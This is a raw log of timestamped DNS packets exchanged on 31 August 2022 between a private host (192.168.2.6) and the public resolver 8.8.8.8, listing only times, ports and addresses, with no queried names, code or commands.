Aug 31, 2022 23:49:57.000348091 CEST	60691	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.019478083 CEST	53	60691	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.020057917 CEST	60692	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.038048983 CEST	53	60692	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.038532972 CEST	60693	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.058454990 CEST	53	60693	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.058875084 CEST	60694	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.078458071 CEST	53	60694	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.078872919 CEST	60695	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.096430063 CEST	53	60695	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.445333958 CEST	56750	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.489593983 CEST	53	56750	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.516345978 CEST	56751	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.535823107 CEST	53	56751	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.536552906 CEST	56752	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.556433916 CEST	53	56752	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.561312914 CEST	56753	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.581238985 CEST	53	56753	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.581695080 CEST	56754	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.601391077 CEST	53	56754	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.601932049 CEST	56755	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:57.621717930 CEST	53	56755	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:57.951314926 CEST	59336	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:58.940262079 CEST	59336	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:59.038297892 CEST	53	59336	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:59.045651913 CEST	59337	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:59.064886093 CEST	53	59337	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:59.065542936 CEST	59338	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:59.085707903 CEST	53	59338	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:59.087832928 CEST	59339	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:59.107444048 CEST	53	59339	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:59.107861042 CEST	59340	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:59.127703905 CEST	53	59340	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:59.128176928 CEST	59341	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:59.148261070 CEST	53	59341	8.8.8.8	192.168.2.6
Aug 31, 2022 23:49:59.493012905 CEST	52715	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:49:59.514354944 CEST	53	59336	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:00.513597965 CEST	52715	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:01.090209007 CEST	53	52715	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.166991949 CEST	53	52715	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.178349018 CEST	52716	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:01.195605040 CEST	53	52716	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.196441889 CEST	52717	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:01.216135979 CEST	53	52717	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.216655016 CEST	52718	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:01.236490965 CEST	53	52718	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.237344027 CEST	52719	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:01.255160093 CEST	53	52719	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.261420965 CEST	52720	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:01.281599998 CEST	53	52720	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.376256943 CEST	53	60690	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:01.616338968 CEST	62221	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:02.627542019 CEST	62221	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.165421963 CEST	53	62221	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.219702959 CEST	62222	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.239063978 CEST	53	62222	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.241400003 CEST	62223	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.259295940 CEST	53	62223	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.259742975 CEST	62224	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.279720068 CEST	53	62224	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.325418949 CEST	62225	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.343146086 CEST	53	62225	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.343590975 CEST	62226	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.361332893 CEST	53	62226	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.789190054 CEST	53	62221	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.807167053 CEST	63263	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.843403101 CEST	53	63263	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.859025002 CEST	63264	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.876193047 CEST	53	63264	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.877265930 CEST	63265	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.896852016 CEST	53	63265	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.897270918 CEST	63266	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.916883945 CEST	53	63266	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.917309046 CEST	63267	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.934696913 CEST	53	63267	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:03.935067892 CEST	63268	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:03.954763889 CEST	53	63268	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:04.372958899 CEST	59998	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:04.441500902 CEST	53	59998	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:04.468360901 CEST	59999	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:04.485769033 CEST	53	59999	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:04.486609936 CEST	60000	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:04.504255056 CEST	53	60000	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:04.504698038 CEST	60001	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:04.522697926 CEST	53	60001	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:04.523119926 CEST	60002	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:04.542658091 CEST	53	60002	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:04.543015003 CEST	60003	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:04.562457085 CEST	53	60003	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:05.013535976 CEST	61229	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:06.002994061 CEST	61229	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:06.137584925 CEST	53	61229	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:06.159151077 CEST	51773	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:06.176224947 CEST	53	51773	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:06.176892996 CEST	51774	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:06.194561005 CEST	53	51774	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:06.195981979 CEST	51775	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:06.215605021 CEST	53	51775	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:06.216034889 CEST	51776	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:06.235455036 CEST	53	51776	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:06.235821962 CEST	51777	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:06.255532980 CEST	53	51777	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:06.749398947 CEST	53461	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:07.172410965 CEST	53	61229	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:07.752329111 CEST	53461	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:07.863023043 CEST	53	53461	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:07.872886896 CEST	52817	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:07.908613920 CEST	53	52817	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:07.911994934 CEST	52818	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:07.947222948 CEST	53	52818	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:07.952331066 CEST	52819	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:07.987987041 CEST	53	52819	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:08.063038111 CEST	52820	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:08.082803011 CEST	53	52820	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:08.085752010 CEST	54197	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:08.104629993 CEST	53	54197	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:08.879440069 CEST	53	53461	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:09.104058981 CEST	57754	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:10.170181990 CEST	57754	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:10.707927942 CEST	53	57754	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:10.771631002 CEST	53	57754	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:11.685503960 CEST	64542	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:11.704840899 CEST	53	64542	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:11.740057945 CEST	64543	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:11.759860039 CEST	53	64543	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:11.785305023 CEST	64544	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:11.805135965 CEST	53	64544	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:11.805562019 CEST	64545	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:11.825198889 CEST	53	64545	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:11.917623043 CEST	64546	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:11.937248945 CEST	53	64546	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:12.346817970 CEST	53590	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:12.383526087 CEST	53	53590	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:12.390027046 CEST	53591	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:12.407648087 CEST	53	53591	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:12.408514977 CEST	53592	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:12.429454088 CEST	53	53592	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:12.431169033 CEST	53593	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:12.453207016 CEST	53	53593	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:12.453787088 CEST	53594	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:12.473371029 CEST	53	53594	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:12.473746061 CEST	53595	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:12.493643045 CEST	53	53595	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:12.822731972 CEST	56358	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.443161964 CEST	53	56358	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.451406002 CEST	56359	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.475533962 CEST	53	56359	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.477447033 CEST	56360	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.497633934 CEST	53	56360	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.505570889 CEST	56361	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.529026031 CEST	53	56361	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.529988050 CEST	56362	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.549556971 CEST	53	56362	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.551243067 CEST	56363	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.571007013 CEST	53	56363	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.907250881 CEST	51362	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.960828066 CEST	53	51362	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.974622965 CEST	51363	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:13.993717909 CEST	53	51363	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:13.994431019 CEST	51364	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:14.013231039 CEST	53	51364	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:14.017877102 CEST	51365	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:14.037378073 CEST	53	51365	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:14.041220903 CEST	51366	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:14.058753014 CEST	53	51366	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:14.061249018 CEST	51367	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:14.081089973 CEST	53	51367	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:14.448813915 CEST	49332	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:14.978720903 CEST	53	49332	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:14.985992908 CEST	49333	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:15.004993916 CEST	53	49333	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:15.005623102 CEST	49334	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:15.023289919 CEST	53	49334	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:15.024115086 CEST	49335	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:15.043770075 CEST	53	49335	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:15.044470072 CEST	49336	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:15.064199924 CEST	53	49336	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:15.074779987 CEST	49337	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:15.094535112 CEST	53	49337	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:15.435657024 CEST	58157	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:16.435070992 CEST	58157	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:17.137248039 CEST	53	58157	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:17.148379087 CEST	58158	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:17.167509079 CEST	53	58158	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:17.168323040 CEST	58159	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:17.187731981 CEST	53	58159	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:17.191071033 CEST	58160	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:17.208631039 CEST	53	58160	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:17.209347010 CEST	58161	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:17.226890087 CEST	53	58161	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:17.227550983 CEST	58162	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:17.246968031 CEST	53	58162	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:17.562474012 CEST	53	58157	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:17.566294909 CEST	57786	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:18.605894089 CEST	53	57786	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:18.609033108 CEST	57786	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:18.620011091 CEST	52844	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:18.639391899 CEST	53	52844	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:18.663878918 CEST	52845	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:18.684160948 CEST	53	52845	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:18.728477955 CEST	52846	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:18.746282101 CEST	53	52846	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:18.746733904 CEST	52847	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:18.766663074 CEST	53	52847	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:18.768532991 CEST	52848	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:18.786726952 CEST	53	52848	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:19.230156898 CEST	64961	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:19.720679045 CEST	53	57786	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:19.806276083 CEST	53	64961	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:19.817965031 CEST	64962	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:19.837085962 CEST	53	64962	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:19.837605953 CEST	64963	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:19.857325077 CEST	53	64963	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:19.857963085 CEST	64964	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:19.877415895 CEST	53	64964	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:19.877923012 CEST	64965	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:19.897783041 CEST	53	64965	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:19.899743080 CEST	64966	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:19.919105053 CEST	53	64966	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:20.262279034 CEST	56295	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:21.269645929 CEST	56295	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.271178961 CEST	56295	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.331629038 CEST	53	56295	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:22.340985060 CEST	56296	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.359858990 CEST	53	56296	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:22.360506058 CEST	56297	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.380099058 CEST	53	56297	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:22.380544901 CEST	56298	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.397959948 CEST	53	56298	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:22.403218031 CEST	56299	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.422846079 CEST	53	56299	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:22.423249006 CEST	56300	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.442930937 CEST	53	56300	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:22.764307022 CEST	64647	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:22.894814968 CEST	53	56295	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:23.301311970 CEST	53	64647	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:23.309506893 CEST	64648	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:23.326419115 CEST	53	64648	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:23.329807043 CEST	64649	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:23.349076033 CEST	53	64649	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:23.349894047 CEST	64650	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:23.367690086 CEST	53	64650	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:23.369930983 CEST	64651	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:23.389586926 CEST	53	64651	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:23.390727997 CEST	64652	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:23.410267115 CEST	53	64652	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:23.749346972 CEST	54503	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.301399946 CEST	53	54503	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.310062885 CEST	51888	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.329447031 CEST	53	51888	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.330288887 CEST	51889	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.350253105 CEST	53	51889	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.350750923 CEST	51890	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.370569944 CEST	53	51890	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.371077061 CEST	51891	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.390916109 CEST	53	51891	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.391366959 CEST	51892	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.411137104 CEST	53	51892	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.730248928 CEST	53041	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.806338072 CEST	53	53041	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.812444925 CEST	53042	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.831897020 CEST	53	53042	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.832633018 CEST	53043	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.850459099 CEST	53	53043	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.850862026 CEST	53044	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.870646000 CEST	53	53044	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.871066093 CEST	53045	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.890717030 CEST	53	53045	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:24.891149998 CEST	53046	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:24.910834074 CEST	53	53046	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:25.258671999 CEST	54508	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:25.904484034 CEST	53	54508	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:25.914251089 CEST	54509	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:25.932872057 CEST	53	54509	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:25.933530092 CEST	54510	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:26.317761898 CEST	53	56295	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:27.946239948 CEST	54511	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:27.967365980 CEST	53	54511	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:27.967772961 CEST	54512	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:27.988606930 CEST	53	54512	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:28.034455061 CEST	54513	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:28.055430889 CEST	53	54513	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:28.706429958 CEST	53193	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:29.724095106 CEST	53193	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:29.829662085 CEST	53	53193	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:29.908477068 CEST	53194	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:29.927891970 CEST	53	53194	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:29.933501959 CEST	53195	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:29.951251984 CEST	53	53195	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:30.011262894 CEST	53196	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:30.030755997 CEST	53	53196	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:30.133681059 CEST	53197	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:30.151573896 CEST	53	53197	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:30.152334929 CEST	53198	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:30.169919014 CEST	53	53198	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:32.441836119 CEST	60008	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.027606010 CEST	53	60008	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.051636934 CEST	60009	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.070842028 CEST	53	60009	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.071441889 CEST	60010	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.089258909 CEST	53	60010	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.089754105 CEST	60011	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.109560013 CEST	53	60011	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.110094070 CEST	60012	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.129426956 CEST	53	60012	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.131000996 CEST	60013	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.150530100 CEST	53	60013	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.499218941 CEST	54200	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.609451056 CEST	53	54200	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.616710901 CEST	54201	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.636173010 CEST	53	54201	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.636816978 CEST	54202	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.656276941 CEST	53	54202	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.657267094 CEST	54203	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.678827047 CEST	53	54203	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.679528952 CEST	54204	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.701402903 CEST	53	54204	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:33.702038050 CEST	54205	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:33.722425938 CEST	53	54205	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.088475943 CEST	50252	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.124522924 CEST	53	50252	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.141758919 CEST	50253	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.160888910 CEST	53	50253	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.167188883 CEST	50254	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.184612036 CEST	53	50254	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.185396910 CEST	50255	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.204812050 CEST	53	50255	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.205420017 CEST	50256	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.224951029 CEST	53	50256	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.225599051 CEST	50257	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.245430946 CEST	53	50257	8.8.8.8	192.168.2.6
Aug 31, 2022 23:50:34.730926037 CEST	64796	53	192.168.2.6	8.8.8.8
Aug 31, 2022 23:50:34.743029118 CEST	53	53193	8.8.8.8	192.168.2.6
